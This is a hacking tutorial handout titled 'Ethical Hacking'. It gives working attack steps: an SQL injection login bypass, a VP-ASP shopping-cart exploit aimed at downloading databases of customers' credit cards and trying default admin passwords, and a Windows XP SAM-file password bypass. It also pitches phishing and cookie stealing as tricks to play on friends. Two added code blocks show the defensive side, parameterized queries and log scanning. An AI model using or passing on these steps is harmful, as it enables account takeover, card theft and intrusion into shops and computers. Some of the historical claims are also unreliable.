
ETHICAL HACKING

MALLAMPATI.KUSUMA. CSE.

Introduction to Hacking!
"Hacking" is the word that shakes everyone whenever it is said or heard by someone. Everyone born in this world with attitude wants to be a Hacker. But it is not a job of a new born baby or an old grown lady. A Hacker needs a brilliant mind to hack anything. His skills should be so powerful that no other hacker can hack him. A Hacker doesn't need a software to hack. There are many rules that he should learn to become an Ethical Hacker. These rules include knowledge of HTML, JavaScripts, Computer Tricks, Cracking & Breaking etc.

History of Hackers!

Kevin Mitnick, often incorrectly called by many God of hackers, broke into the computer systems of the World's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.

Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a fast-track extradition to the US where he is a Wanted man. The next hearing in the case is slated for today.

Hacking Methods!

Phishing Method- Phishing is the method that you are familiar with. You create a Fake Account and ID in yahoo and fool your friends by telling them to send the victim's ID, their own ID and their own Password in your Fake Yahoo Account.

Brute Force Hack- Brute Force Hack is a Hacking which takes much time to get Password of the Victim and it needs a Hacker to learn about JavaScripts and all the non-sense.

Fake Login Hack- Fake Login Hack is the Hacking used by most of you for your goal by creating a Fake Login Page and telling your friends to login there and the Password would come to you.

Cookie Steal Hack- Cookie Steal Hack is somewhat similar to Fake Login Hack as you prepare a Cookie Stealer and tell your friends to open your Cookie so that his Password would come to you.

Web Mail Hack- Web Mail Hack is the toughest method to learn for Hacking as it also needs a Hacker to learn about JavaScripts, Computer Tricks and much more and there is also a software for this type of Hack.

Types of Hackers!

White Hat Hacker- Also referred as Ethical Hacker or sometimes called as Sneakers. A White Hat Hacker mainly focuses on securing corporate Network from outsider threat. They are with good intention who fight against Black Hat.

Grey Hat Hacker- They are Skilled Hacker who sometimes act legally and sometime not. In simple word you may call a Grey Hat hacker as Hybrid between White Hat and Black Hat hacker.

Black Hat Hacker- Also referred as Cracker. A Black Hat Hacker's intention is to break into others Network, and wish to secure his own machine. They often uses different techniques for breaking into systems which can involve advanced programming skills and social engineering.

HACKING WITH ETHICS!!!

HACKING WEBSITES
If you possess the HTML & JAVA knowledge then u can even access password protected websites. To hack a Password Protected Website just follow these steps:

* Open the website u want to hack. Provide wrong username-password (e.g.: Username - me and Password - ' or 1=1 --). An error occurred saying wrong username-password. Now be prepared, ur work starts from here...
* Right click anywhere on that page => go to view source.
* There u can see the html codings with javascripts.
* Before this login information copy the url of the site in which you are.
* Then delete the java script from the above that validates ur information in the server. (Do this very carefully, ur success to hack the site depends upon this i.e. how efficiently u delete the Javascripts that validate ur account information.)
* Then look for...code ..: input name="password" type="password" => replace there instead of . See there if maxlength of password is less than 11 then increase it to 11 (e.g.: if then write
* Just go to file => save as and save it anywhere within the hard disk with ext .html (e.g.: c:hack.htm).
* Close ur webpage and go to the webpage u saved in your hard disk (e.g.: c:hack.htm). Open it.
* U see that some changes in current page as compared to original one. Don't worry.
* Provide any username [e.g.: hacker] and password [e.g.: ' or 1=1 --].

Congrats! U hav cracked the above website and entered into the account of 1st user saved in the server's database.
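
Why the string ' or 1=1 -- logs in as the first user, and what stops it, shown as an added example that is not part of the original document: the flaw is a server-side query built by pasting form input into SQL, so no change to the page's JavaScript matters once the query is parameterized. The table, the account names and both function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample user table (not from the page).
    Plaintext passwords only keep the sample short; store salted hashes in practice."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("alice", "s3cret-A"), ("bob", "s3cret-B")])
    return db

def login_concatenated(db, username, password):
    """Flawed pattern: form input becomes part of the SQL text itself."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    # With password = "' or 1=1 --" the statement the database parses is:
    #   ... WHERE username = 'me' AND password = '' or 1=1 --'
    # "--" comments out the trailing quote and "or 1=1" is true for every row,
    # so the first row of the table is returned whatever the username was.
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"          # the input quoted in the steps above
    for login in (login_concatenated, login_parameterized):
        print(login.__name__, "->", login(db, "me", payload))
```

Client-side checks such as maxlength or JavaScript validation are not a control here, because the server must treat every request as untrusted input regardless of what the form allowed.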

LOCALLY STORED PASSWORDS

Most browsers, including Internet Explorer and Netscape, the AOL client, and Windows Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN

A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans, any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught.

Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.

KEYLOGGER

A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undetectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.

IMPERSONATION

It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website.

For instance, consider the effect of seeing the following series of windows: If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.

SNIFFING

If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.

SOCIAL ENGINEERING

Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.

These are the basic methods that we are aware of for hacking an AOL, Yahoo, Hotmail or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.

Basic needs for hacking !!!

You learn about computers - in as much detail as you can. Now most people will disagree with this but the first thing you should do is learn HTML, this way you will know how to make decent websites. You may wonder why? Because hacking is knowing everything about a computer and using that knowledge to get what you want. Now after you have done this you can start on this list of things to do.

1. Learn about hardware - basically how your computer works.
2. Learn about different types of software.
3. Learn DOS. (learn everything possible)
4. Learn how to make a few batch files.
5. Port scanning. (download blues port scanner if it's your first time)
6. Learn a few programming languages: HTML, C++, Python, Perl.... (i'd recommend learning html as your first lang)
7. How to secure yourself (proxy, hiding ip etc)
8. FTP
9. TCP/IP, UDP, DHCP
10. Get your hands dirty with networking
11. Learn dissembler language (its the most basic language for understanding machine language and very useful to understand when anything is disassembled and decoded)
12. Learn to use a Unix os. (a Unix system is generally loaded with networking tools as well as a few hacking tools)
13. Learn how to use Exploits and compile them. (Perl and c++ is must)

SHOP ADMIN HACKING

This method is used for testing the knowledge or for getting the credit card for shopping on internet or for fun or any way but not for cashing (bcoz this method dont give PIN - 4 digit passcode), only give cc numb, cvv2 and other basic info.

SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE: VP-ASP, X CART .. ETC ETC. I M POSTING TUTORIAL FOR HACKING VP-ASP SHOP.

i hope u seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form, very secure, they r carts .. like vp-asp, xcarts .. specific sites are not hacked but carts are hack.. below i m posting tutorial to hack VP ASP cart. now every site which use that cart can be hacked and through their *mdb file u can get their clients' credit card details and also login name and password of their admin area, and all other info of clients and company secrets.

HERE WE GO ...
*-*-*-*-*-*-*-*-*

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites

hmmm, Good Q. Finding VP-ASP 5.00 sites is so simple... Go to google.com and type:

intitle: VP-ASP Shopping Cart 5.00

You will find many websites with VP-ASP 5.00 cart software installed.

Now let's go to the exploit.. the page will be like this:

****://***.victim.com/shop/shopdisplaycategories.asp

The exploit is: diag_dbtest.asp

so do this:

****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:

xDatabase shopping140
xDblocation resx
xdatabasetype xEmail xEmailName xEmailSubject xEmailSystem xEmailType xOrdernumber

.:. EXAMPLE .:.

the most important thing here is xDatabase

xDatabase: shopping140

ok now the URL will be like this:

****://***.victim.com/shop/shopping140.mdb

if you didn't download the Database.. Try this while there is dblocation.

xDblocation resx

the url will be:

****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this:

****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com. Or use MS Office Access. inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

the admin login page is usually located here:

****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin

OR

Username: vpasp
password: vpasp
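
From the shop owner's side, the requests described above leave a clear trail in the web server's access log. The following added example (not part of the original document) scans Common Log Format lines for requests to diag_dbtest.asp or any .mdb file and marks the ones the server actually answered with a 2xx status; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(target):
    """Return a reason if the request path touches the files the page names."""
    # Decode %xx escapes and lowercase: IIS treats paths case-insensitively.
    path = unquote(urlsplit(target).path).lower()
    name = path.rsplit("/", 1)[-1]
    if name == "diag_dbtest.asp":
        return "diagnostic page"
    if name.endswith(".mdb"):
        return "database file"
    return None

def find_exposures(lines):
    """Return (ip, reason, status, served) for every matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not CLF
        ip, _method, target, status = m.groups()
        reason = classify(target)
        if reason:
            findings.append((ip, reason, int(status), status.startswith("2")))
    return findings

# Constructed sample log (documentation address ranges, invented timestamps).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/shopdisplaycategories.asp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /shop/diag_dbtest.asp HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:01:30 +0000] "GET /shop/Shopping140.MDB HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /shop/resx/shopping140%2Emdb HTTP/1.1" 200 904192',
]

if __name__ == "__main__":
    for ip, reason, status, served in find_exposures(SAMPLE):
        print(ip, reason, status, "SERVED" if served else "not served")
```

Any finding with served set means the file was downloadable from the web root; the usual remedies are to keep the database outside the served directory, remove the diagnostic page from production, and change the default admin credentials.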

Hacking Windows XP!

* Boot the PC in Safe Mode by pressing the F8 key.
* Select the Safe Mode option, now you can now Login as an Administrator and XP won't prompt for the Password.
* Try rebooting the PC in DOS.
* Now, Access to C:\Windows\system32\config\SAM.
* Rename SAM as SAM.mj.
* Now XP won't ask for Password next time you Login.
* Now, again go to Start menu --> Run.
* Type there cmd prompt.
* Type net user *, It will list all the users.
* Again type net user "administrator" or the name of the administrator "name" *.
* It will ask for the password. Type the password and there you are done.
* Hold the Ctrl+Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator.

To unhide the Administrator account so it does show up:

* Again go to Start --> Run --> regedit.
* Go to HKEY_LOCAL_MACHINE --> SOFTWARE --> Microsoft --> Windows NT --> CurrentVersion --> Winlogon --> SpecialAccounts --> UserList.
* Unhide the Administrator key by giving it a value of 1.
